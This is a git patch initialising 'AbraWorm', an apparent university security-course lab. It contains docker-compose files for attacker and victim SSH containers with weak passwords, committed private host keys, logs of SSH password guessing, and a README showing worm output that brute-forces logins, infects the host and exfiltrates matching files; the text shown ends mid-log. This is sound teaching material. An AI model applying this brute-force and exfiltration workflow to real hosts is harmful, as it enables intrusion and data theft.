From 29a172eaecaa0e0cb3baf4bc5324a77cc4ec949e Mon Sep 17 00:00:00 2001 From: Matteo Zoia Date: Tue, 7 Nov 2023 10:40:28 +0100 Subject: [PATCH] init --- .gitignore | 4 + .gitlab-ci.yml | 28 ++ README.md | 63 +++ attacker/config/.bash_history | 2 + attacker/config/.gitkeep | 0 attacker/config/.ssh/authorized_keys | 0 attacker/config/logs/loginfo.txt | 1 + attacker/config/logs/openssh/current | 23 + attacker/config/logs/openssh/lock | 0 attacker/config/logs/openssh/state | 0 .../config/ssh_host_keys/ssh_host_ecdsa_key | 9 + .../ssh_host_keys/ssh_host_ecdsa_key.pub | 1 + .../config/ssh_host_keys/ssh_host_ed25519_key | 7 + .../ssh_host_keys/ssh_host_ed25519_key.pub | 1 + .../config/ssh_host_keys/ssh_host_rsa_key | 38 ++ .../config/ssh_host_keys/ssh_host_rsa_key.pub | 1 + attacker/config/ssh_host_keys/sshd_config | 117 +++++ attacker/config/sshd.pid | 1 + docker-compose.yaml | 40 ++ user/config/.bash_history | 3 + user/config/.ssh/authorized_keys | 0 user/config/logs/loginfo.txt | 1 + user/config/logs/openssh/current | 428 ++++++++++++++++++ user/config/logs/openssh/lock | 0 user/config/logs/openssh/state | 0 user/config/ssh_host_keys/ssh_host_ecdsa_key | 9 + .../ssh_host_keys/ssh_host_ecdsa_key.pub | 1 + .../config/ssh_host_keys/ssh_host_ed25519_key | 7 + .../ssh_host_keys/ssh_host_ed25519_key.pub | 1 + user/config/ssh_host_keys/ssh_host_rsa_key | 38 ++ .../config/ssh_host_keys/ssh_host_rsa_key.pub | 1 + user/config/ssh_host_keys/sshd_config | 117 +++++ user/config/sshd.pid | 1 + user/config/test.txt | 2 + user/init-scripts/disable-maxauth.sh | 4 + worm/AbraWorm.py | 285 ++++++++++++ 36 files changed, 1234 insertions(+) create mode 100644 .gitignore create mode 100644 .gitlab-ci.yml create mode 100644 README.md create mode 100644 attacker/config/.bash_history create mode 100644 attacker/config/.gitkeep create mode 100644 attacker/config/.ssh/authorized_keys create mode 100644 attacker/config/logs/loginfo.txt create mode 100644 attacker/config/logs/openssh/current create mode 100644 attacker/config/logs/openssh/lock create mode 100644 attacker/config/logs/openssh/state create mode 100644 attacker/config/ssh_host_keys/ssh_host_ecdsa_key create mode 100644 attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub create mode 100644 attacker/config/ssh_host_keys/ssh_host_ed25519_key create mode 100644 attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub create mode 100644 attacker/config/ssh_host_keys/ssh_host_rsa_key create mode 100644 attacker/config/ssh_host_keys/ssh_host_rsa_key.pub create mode 100644 attacker/config/ssh_host_keys/sshd_config create mode 100644 attacker/config/sshd.pid create mode 100644 docker-compose.yaml create mode 100644 user/config/.bash_history create mode 100644 user/config/.ssh/authorized_keys create mode 100644 user/config/logs/loginfo.txt create mode 100644 user/config/logs/openssh/current create mode 100644 user/config/logs/openssh/lock create mode 100644 user/config/logs/openssh/state create mode 100644 user/config/ssh_host_keys/ssh_host_ecdsa_key create mode 100644 user/config/ssh_host_keys/ssh_host_ecdsa_key.pub create mode 100644 user/config/ssh_host_keys/ssh_host_ed25519_key create mode 100644 user/config/ssh_host_keys/ssh_host_ed25519_key.pub create mode 100644 user/config/ssh_host_keys/ssh_host_rsa_key create mode 100644 user/config/ssh_host_keys/ssh_host_rsa_key.pub create mode 100644 user/config/ssh_host_keys/sshd_config create mode 100644 user/config/sshd.pid create mode 100644 user/config/test.txt create mode 100755 user/init-scripts/disable-maxauth.sh create mode 100644 worm/AbraWorm.py diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b31b6f0 --- /dev/null +++ b/.gitignore @@ -0,0 +1,4 @@ +.DS_Store +*/.DS_Store + +worm/.venv/ \ No newline at end of file diff --git a/.gitlab-ci.yml b/.gitlab-ci.yml new file mode 100644 index 0000000..d1ddb37 --- /dev/null +++ b/.gitlab-ci.yml @@ -0,0 +1,28 @@ +image: + name: docker:latest + +services: + - docker:dind + +variables: + DOCKER_HOST: tcp://docker:2375 + DOCKER_DRIVER: overlay2 + +stages: + - test_images + +test_images: + stage: test_images + image: docker:latest + script: + - pwd + - ls -la + - docker-compose up -d + - docker ps + - apk update + - apk add python3 + - python3 -m py_compile worm/AbraWorm.py + artifacts: + paths: + - worm/AbraWorm.py + - docker-compose.yaml \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..98b66fa --- /dev/null +++ b/README.md @@ -0,0 +1,63 @@ +# AbraWorm +_Corso di Sicurezza e Privatezza @ Unimi_ + +## Passaggi per l'utilizzo +_Testato su ubuntu_ + +* Installazione di docker e docker-compose https://docs.docker.com/engine/install/ubuntu/ + +* Con il comando `docker-compose up --force-recreate` vengono scaricate le immagini di openssh-server +(immagini minimali da circa 12MB). Vengono creati 2 container di nome _openssh-server-attacker_ e +_openssh-server-user_. Entrambi i container espongono la porta 2222 che viene rimappata sulla porta +dell'host 22 per openssh-server-user e 12345 per openssh-server-attacker. Ora la macchina dello +studente avrá due porte esposte 22 e 12345, si puó vedere con `netstat -tulpn | grep LISTEN` + +``` +teozoia@teozoia-blade:~/Desktop/abraworm/abraworm/worm$ netstat -tulpn | grep LISTEN +tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - +tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN - +... +``` + +* Come dichiarato all'interno del file _docker-compose.yaml_ al rispettivo container verrá montata la cartella +_user/config_ e _attacker/config_; da notare che in _user/config_ é presente il file _text.txt_ il quale contiene +la parola abracadabra. + +* Per testare il funzionamento dei due container é possibile collegarsi al container user con +`ssh user@127.0.0.1` (password: password) e attacker con `ssh seed@127.0.0.1 -p 12345` (password: dees). + +* É possibile eseguire il worm sulla propria macchina `python3 AbraWorm.py`. Se si vuole velocizzare il processo +é possibile togliere il `while` e fare in modo che le funzioni `get_password_list()` e `get_user_list()` +ritornino una lista fissata non lunga. Per usare il worm in modo verboso é necessario che `DEBUG=1`. + +``` +teozoia@teozoia-blade:~/Desktop/abraworm/abraworm/worm$ python3 AbraWorm.py +user@127.0.0.1 -> adjfhfad +Exception catched: Authentication failed. +user@127.0.0.1 -> dhf931f +Exception catched: Authentication failed. +matteo@127.0.0.1 -> idhf +Exception catched: Authentication failed. +user@127.0.0.1 -> password +Connected user@127.0.0.1 -> password +[user@127.0.0.1] executing: ls + stdout:['AbraWorm.py\n', 'logs\n', 'ssh_host_keys\n', 'sshd.pid\n', 'test.txt\n'] +Target user@127.0.0.1 already infected +[user@127.0.0.1] executing: grep -ls abracadabra * + stdout:['AbraWorm.py\n', 'test.txt\n'] +Files of interest at the target: ['AbraWorm.py', 'test.txt'] +Will now try to exfiltrate the files +Connected to exhiltration host +``` + +## Docker install +https://docs.docker.com/engine/install/ubuntu/ + +* `sudo apt-get remove docker docker-engine docker.io containerd runc` +* `sudo apt-get update` +* `sudo apt-get install ca-certificates curl gnupg lsb-release` +* `sudo mkdir -p /etc/apt/keyrings` +* `curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg` +* `echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null` +* `sudo apt-get update` +* `sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin` diff --git a/attacker/config/.bash_history b/attacker/config/.bash_history new file mode 100644 index 0000000..0eee24b --- /dev/null +++ b/attacker/config/.bash_history @@ -0,0 +1,2 @@ +ls +exit diff --git a/attacker/config/.gitkeep b/attacker/config/.gitkeep new file mode 100644 index 0000000..e69de29 diff --git a/attacker/config/.ssh/authorized_keys b/attacker/config/.ssh/authorized_keys new file mode 100644 index 0000000..e69de29 diff --git a/attacker/config/logs/loginfo.txt b/attacker/config/logs/loginfo.txt new file mode 100644 index 0000000..1632abe --- /dev/null +++ b/attacker/config/logs/loginfo.txt @@ -0,0 +1 @@ +The current log file is named "current". The rotated log files are gzipped, named with a TAI64N timestamp and a ".s" extension diff --git a/attacker/config/logs/openssh/current b/attacker/config/logs/openssh/current new file mode 100644 index 0000000..8a4653c --- /dev/null +++ b/attacker/config/logs/openssh/current @@ -0,0 +1,23 @@ +2023-11-06 22:42:09.880207882 Server listening on 0.0.0.0 port 2222. +2023-11-06 22:42:09.881994382 Server listening on :: port 2222. +2023-11-06 22:42:10.940105549 kex_exchange_identification: Connection closed by remote host +2023-11-06 22:42:10.940111716 Connection closed by 127.0.0.1 port 45942 +2023-11-06 22:45:26.231854167 Accepted password for seed from 172.18.0.1 port 61352 ssh2 +2023-11-06 22:45:26.262239876 Attempt to write login records by non-root user (aborting) +2023-11-06 22:45:31.846185795 Attempt to write login records by non-root user (aborting) +2023-11-06 22:45:31.847341337 Received disconnect from 172.18.0.1 port 61352:11: disconnected by user +2023-11-06 22:45:31.847342962 Disconnected from user seed 172.18.0.1 port 61352 +2023-11-06 22:50:37.233855881 Accepted password for seed from 172.18.0.1 port 64628 ssh2 +2023-11-06 22:51:37.251898047 Received signal 15; terminating. +2023-11-07 09:12:43.560274049 Server listening on 0.0.0.0 port 2222. +2023-11-07 09:12:43.560420424 Server listening on :: port 2222. +2023-11-07 09:12:44.594276967 kex_exchange_identification: Connection closed by remote host +2023-11-07 09:12:44.596037883 Connection closed by 127.0.0.1 port 45730 +2023-11-07 09:15:28.116071792 Accepted password for seed from 172.18.0.1 port 63686 ssh2 +2023-11-07 09:18:09.807334298 Accepted password for seed from 172.18.0.1 port 56706 ssh2 +2023-11-07 09:19:40.980847923 Received signal 15; terminating. +2023-11-07 10:26:50.142897424 Server listening on 0.0.0.0 port 2222. +2023-11-07 10:26:50.143966716 Server listening on :: port 2222. +2023-11-07 10:26:51.193576550 kex_exchange_identification: Connection closed by remote host +2023-11-07 10:26:51.193582467 Connection closed by 127.0.0.1 port 51650 +2023-11-07 10:27:15.669542339 Accepted password for seed from 172.18.0.1 port 63226 ssh2 diff --git a/attacker/config/logs/openssh/lock b/attacker/config/logs/openssh/lock new file mode 100644 index 0000000..e69de29 diff --git a/attacker/config/logs/openssh/state b/attacker/config/logs/openssh/state new file mode 100644 index 0000000..e69de29 diff --git a/attacker/config/ssh_host_keys/ssh_host_ecdsa_key b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key new file mode 100644 index 0000000..365a1c2 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key @@ -0,0 +1,9 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS +1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQRY9WI38IP7LqpZj4w3gpOATSr43ajL +DLZL8KBPyg+HUqjLg6gOTRb9lgSy5UIn6zXeVUyW2s0fF5GAgx6zVNd7AAAAuCLGBKUixg +SlAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFj1Yjfwg/suqlmP +jDeCk4BNKvjdqMsMtkvwoE/KD4dSqMuDqA5NFv2WBLLlQifrNd5VTJbazR8XkYCDHrNU13 +sAAAAhALY+XXKnb6mrNV3gY1OKXPCYNLbmOBVwfTlqcCr3lf37AAAAHHJvb3RAb3BlbnNz +aC1zZXJ2ZXItYXR0YWNrZXIBAgM= +-----END OPENSSH PRIVATE KEY----- diff --git a/attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub new file mode 100644 index 0000000..b1ba343 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub @@ -0,0 +1 @@ +ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFj1Yjfwg/suqlmPjDeCk4BNKvjdqMsMtkvwoE/KD4dSqMuDqA5NFv2WBLLlQifrNd5VTJbazR8XkYCDHrNU13s= root@openssh-server-attacker diff --git a/attacker/config/ssh_host_keys/ssh_host_ed25519_key b/attacker/config/ssh_host_keys/ssh_host_ed25519_key new file mode 100644 index 0000000..d1ed26f --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_ed25519_key @@ -0,0 +1,7 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW +QyNTUxOQAAACAOuVKoNfSwDjmKuedxw4yR/+Ns24N0ODxqY70K8zfH/wAAAKD6rigZ+q4o +GQAAAAtzc2gtZWQyNTUxOQAAACAOuVKoNfSwDjmKuedxw4yR/+Ns24N0ODxqY70K8zfH/w +AAAECywErKvj8VoVo5QRNYtxud3cQkqYyda/yI0mT9de1ciA65Uqg19LAOOYq553HDjJH/ +42zbg3Q4PGpjvQrzN8f/AAAAHHJvb3RAb3BlbnNzaC1zZXJ2ZXItYXR0YWNrZXIB +-----END OPENSSH PRIVATE KEY----- diff --git a/attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub b/attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub new file mode 100644 index 0000000..68b0c59 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA65Uqg19LAOOYq553HDjJH/42zbg3Q4PGpjvQrzN8f/ root@openssh-server-attacker diff --git a/attacker/config/ssh_host_keys/ssh_host_rsa_key b/attacker/config/ssh_host_keys/ssh_host_rsa_key new file mode 100644 index 0000000..7d7cfa5 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_rsa_key @@ -0,0 +1,38 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +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 +-----END OPENSSH PRIVATE KEY----- diff --git a/attacker/config/ssh_host_keys/ssh_host_rsa_key.pub b/attacker/config/ssh_host_keys/ssh_host_rsa_key.pub new file mode 100644 index 0000000..412f8f4 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_rsa_key.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJHsaQ6y/OHM8pmezG5Tj3MIcoDWMutJumf7vXoShepoRDO30+r4Wf0yuPIYgtAFH4LpZ5u9/obi93y9IiY7WpACoNEOWwOGUEI1+BPvQh2IQoNE1JndGf74+H7jQVd4weg7/vKYxsO1SD8ypLGO+TL1DnCH15qN9zr63tEzWC7+l06PTnJNv9rXOSI4PjyJ42rVj7GXqYfm5wFXVnGXcq8dOeoIHPWwkSwm9YriKjtykNFcu5lEpgCGqz6wfDyEnGtIZoQaTDzs6bkhzycrFXSvHxhh+LlRNDGhTgCo8Kt43M4wFIe6q+7LVUEDab6CWn+hGhixqfsG0GSGQzTM5XPg1byXbq7pocxoeKguQJZi6pGywBhl+lfEvY2riLQJwFa83xewVPaUavQ0SIc5HOrDWY/9Xor+ITyTF5hrK6kdTCc3p6MjktlWSFkHUJrnj7naDLjitKhTqcCVPuCvtoRlmtTbTN+Imbi9+Fiel2MyeFTcCSAzCPu1a+sklr/L0= root@openssh-server-attacker diff --git a/attacker/config/ssh_host_keys/sshd_config b/attacker/config/ssh_host_keys/sshd_config new file mode 100644 index 0000000..747fa79 --- /dev/null +++ b/attacker/config/ssh_host_keys/sshd_config @@ -0,0 +1,117 @@ +# $OpenBSD: sshd_config,v 1.104 2021/07/02 05:11:21 dtucker Exp $ + +# This is the sshd server system-wide configuration file. See +# sshd_config(5) for more information. + +# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + +# The strategy used for options in the default sshd_config shipped with +# OpenSSH is to specify options with their default value where +# possible, but leave them commented. Uncommented options override the +# default value. + +Port 2222 +#AddressFamily any +#ListenAddress 0.0.0.0 +#ListenAddress :: + +#HostKey /etc/ssh/ssh_host_rsa_key +#HostKey /etc/ssh/ssh_host_ecdsa_key +#HostKey /etc/ssh/ssh_host_ed25519_key + +# Ciphers and keying +#RekeyLimit default none + +# Logging +#SyslogFacility AUTH +#LogLevel INFO + +# Authentication: + +#LoginGraceTime 2m +#PermitRootLogin prohibit-password +#StrictModes yes +#MaxAuthTries 6 +#MaxSessions 10 + +#PubkeyAuthentication yes + +# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2 +# but this is overridden so installations will only check .ssh/authorized_keys +AuthorizedKeysFile .ssh/authorized_keys + +#AuthorizedPrincipalsFile none + +#AuthorizedKeysCommand none +#AuthorizedKeysCommandUser nobody + +# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts +#HostbasedAuthentication no +# Change to yes if you don't trust ~/.ssh/known_hosts for +# HostbasedAuthentication +#IgnoreUserKnownHosts no +# Don't read the user's ~/.rhosts and ~/.shosts files +#IgnoreRhosts yes + +# To disable tunneled clear text passwords, change to no here! +PasswordAuthentication yes +#PermitEmptyPasswords no + +# Change to no to disable s/key passwords +#KbdInteractiveAuthentication yes + +# Kerberos options +#KerberosAuthentication no +#KerberosOrLocalPasswd yes +#KerberosTicketCleanup yes +#KerberosGetAFSToken no + +# GSSAPI options +#GSSAPIAuthentication no +#GSSAPICleanupCredentials yes + +# Set this to 'yes' to enable PAM authentication, account processing, +# and session processing. If this is enabled, PAM authentication will +# be allowed through the KbdInteractiveAuthentication and +# PasswordAuthentication. Depending on your PAM configuration, +# PAM authentication via KbdInteractiveAuthentication may bypass +# the setting of "PermitRootLogin prohibit-password". +# If you just want the PAM account and session checks to run without +# PAM authentication, then enable this but set PasswordAuthentication +# and KbdInteractiveAuthentication to 'no'. +#UsePAM no + +#AllowAgentForwarding yes +# Feel free to re-enable these if your use case requires them. +AllowTcpForwarding no +GatewayPorts no +X11Forwarding no +#X11DisplayOffset 10 +#X11UseLocalhost yes +#PermitTTY yes +#PrintMotd yes +#PrintLastLog yes +#TCPKeepAlive yes +#PermitUserEnvironment no +#Compression delayed +#ClientAliveInterval 0 +#ClientAliveCountMax 3 +#UseDNS no +PidFile /config/sshd.pid +#MaxStartups 10:30:100 +#PermitTunnel no +#ChrootDirectory none +#VersionAddendum none + +# no default banner path +#Banner none + +# override default of no subsystems +Subsystem sftp internal-sftp + +# Example of overriding settings on a per-user basis +#Match User anoncvs +# X11Forwarding no +# AllowTcpForwarding no +# PermitTTY no +# ForceCommand cvs server diff --git a/attacker/config/sshd.pid b/attacker/config/sshd.pid new file mode 100644 index 0000000..4e9bdff --- /dev/null +++ b/attacker/config/sshd.pid @@ -0,0 +1 @@ +164 diff --git a/docker-compose.yaml b/docker-compose.yaml new file mode 100644 index 0000000..1bd9c65 --- /dev/null +++ b/docker-compose.yaml @@ -0,0 +1,40 @@ +version: "2.1" +services: + openssh-server-attacker: + image: lscr.io/linuxserver/openssh-server:latest + container_name: openssh-server-attacker + hostname: openssh-server-attacker + environment: + - PUID=1000 + - PGID=1000 + - TZ=Europe/Rome + - SUDO_ACCESS=false + - PASSWORD_ACCESS=true + - USER_PASSWORD=dees + - USER_NAME=seed + - PORT=22 + volumes: + - ./attacker/config:/config + ports: + - "12345:2222" + restart: unless-stopped + + openssh-server-user: + image: lscr.io/linuxserver/openssh-server:latest + container_name: openssh-server-user + hostname: openssh-server-user + environment: + - PUID=1000 + - PGID=1000 + - TZ=Europe/Rome + - SUDO_ACCESS=true + - PASSWORD_ACCESS=true + - USER_PASSWORD=password + - USER_NAME=user + - PORT=22 + volumes: + - ./user/config:/config + - ./user/init-scripts:/custom-cont-init.d:ro + ports: + - "22:2222" + restart: unless-stopped diff --git a/user/config/.bash_history b/user/config/.bash_history new file mode 100644 index 0000000..9f4c330 --- /dev/null +++ b/user/config/.bash_history @@ -0,0 +1,3 @@ +ls +cat test.txt +exit diff --git a/user/config/.ssh/authorized_keys b/user/config/.ssh/authorized_keys new file mode 100644 index 0000000..e69de29 diff --git a/user/config/logs/loginfo.txt b/user/config/logs/loginfo.txt new file mode 100644 index 0000000..1632abe --- /dev/null +++ b/user/config/logs/loginfo.txt @@ -0,0 +1 @@ +The current log file is named "current". The rotated log files are gzipped, named with a TAI64N timestamp and a ".s" extension diff --git a/user/config/logs/openssh/current b/user/config/logs/openssh/current new file mode 100644 index 0000000..c684eed --- /dev/null +++ b/user/config/logs/openssh/current @@ -0,0 +1,428 @@ +2023-11-06 22:42:09.909313882 Server listening on 0.0.0.0 port 2222. +2023-11-06 22:42:09.909556590 Server listening on :: port 2222. +2023-11-06 22:42:10.943821799 kex_exchange_identification: Connection closed by remote host +2023-11-06 22:42:10.943824758 Connection closed by 127.0.0.1 port 45944 +2023-11-06 22:45:00.956156086 Accepted password for user from 172.18.0.1 port 55052 ssh2 +2023-11-06 22:45:00.980113919 Attempt to write login records by non-root user (aborting) +2023-11-06 22:45:07.549622381 Attempt to write login records by non-root user (aborting) +2023-11-06 22:45:07.551244798 Received disconnect from 172.18.0.1 port 55052:11: disconnected by user +2023-11-06 22:45:07.551246923 Disconnected from user user 172.18.0.1 port 55052 +2023-11-06 22:47:28.575557168 Invalid user admin from 172.18.0.1 port 55098 +2023-11-06 22:47:29.632256669 Could not get shadow information for NOUSER +2023-11-06 22:47:29.644074210 Failed password for invalid user admin from 172.18.0.1 port 55098 ssh2 +2023-11-06 22:47:29.700889169 Invalid user account from 172.18.0.1 port 56802 +2023-11-06 22:47:30.731651586 Could not get shadow information for NOUSER +2023-11-06 22:47:30.742260336 Failed password for invalid user account from 172.18.0.1 port 56802 ssh2 +2023-11-06 22:47:30.791357503 Invalid user vagrant from 172.18.0.1 port 56804 +2023-11-06 22:47:31.819007795 Could not get shadow information for NOUSER +2023-11-06 22:47:31.839216003 Failed password for invalid user vagrant from 172.18.0.1 port 56804 ssh2 +2023-11-06 22:47:31.890497045 Invalid user kali from 172.18.0.1 port 56806 +2023-11-06 22:47:32.925557170 Could not get shadow information for NOUSER +2023-11-06 22:47:32.936197837 Failed password for invalid user kali from 172.18.0.1 port 56806 ssh2 +2023-11-06 22:47:34.032862379 Failed password for user from 172.18.0.1 port 56808 ssh2 +2023-11-06 22:47:34.086105088 Invalid user adaliah from 172.18.0.1 port 56810 +2023-11-06 22:47:35.111440838 Could not get shadow information for NOUSER +2023-11-06 22:47:35.123406630 Failed password for invalid user adaliah from 172.18.0.1 port 56810 ssh2 +2023-11-06 22:47:35.176435463 Invalid user adversary from 172.18.0.1 port 56812 +2023-11-06 22:47:36.214857172 Could not get shadow information for NOUSER +2023-11-06 22:47:36.222375714 Failed password for invalid user adversary from 172.18.0.1 port 56812 ssh2 +2023-11-06 22:47:36.280291214 Invalid user admin from 172.18.0.1 port 56814 +2023-11-06 22:47:37.316241756 Could not get shadow information for NOUSER +2023-11-06 22:47:37.327537131 Failed password for invalid user admin from 172.18.0.1 port 56814 ssh2 +2023-11-06 22:47:37.381053006 Invalid user account from 172.18.0.1 port 56816 +2023-11-06 22:47:38.411561215 Could not get shadow information for NOUSER +2023-11-06 22:47:38.423963423 Failed password for invalid user account from 172.18.0.1 port 56816 ssh2 +2023-11-06 22:47:38.473218465 Invalid user vagrant from 172.18.0.1 port 56818 +2023-11-06 22:47:39.511063257 Could not get shadow information for NOUSER +2023-11-06 22:47:39.517019382 Failed password for invalid user vagrant from 172.18.0.1 port 56818 ssh2 +2023-11-06 22:47:39.559308174 Invalid user kali from 172.18.0.1 port 57166 +2023-11-06 22:47:40.589073841 Could not get shadow information for NOUSER +2023-11-06 22:47:40.601132341 Failed password for invalid user kali from 172.18.0.1 port 57166 ssh2 +2023-11-06 22:47:41.694112425 Failed password for user from 172.18.0.1 port 57168 ssh2 +2023-11-06 22:47:41.748055216 Invalid user adaliah from 172.18.0.1 port 57170 +2023-11-06 22:47:42.773135050 Could not get shadow information for NOUSER +2023-11-06 22:47:42.785041258 Failed password for invalid user adaliah from 172.18.0.1 port 57170 ssh2 +2023-11-06 22:47:42.831820675 Invalid user adversary from 172.18.0.1 port 57172 +2023-11-06 22:47:43.863963884 Could not get shadow information for NOUSER +2023-11-06 22:47:43.878099967 Failed password for invalid user adversary from 172.18.0.1 port 57172 ssh2 +2023-11-06 22:47:43.938541301 Invalid user admin from 172.18.0.1 port 57174 +2023-11-06 22:47:44.975590718 Could not get shadow information for NOUSER +2023-11-06 22:47:44.987088468 Failed password for invalid user admin from 172.18.0.1 port 57174 ssh2 +2023-11-06 22:47:45.037872718 Invalid user account from 172.18.0.1 port 57176 +2023-11-06 22:47:46.068171510 Could not get shadow information for NOUSER +2023-11-06 22:47:46.080754760 Failed password for invalid user account from 172.18.0.1 port 57176 ssh2 +2023-11-06 22:47:46.126451093 Invalid user vagrant from 172.18.0.1 port 57178 +2023-11-06 22:47:47.154401385 Could not get shadow information for 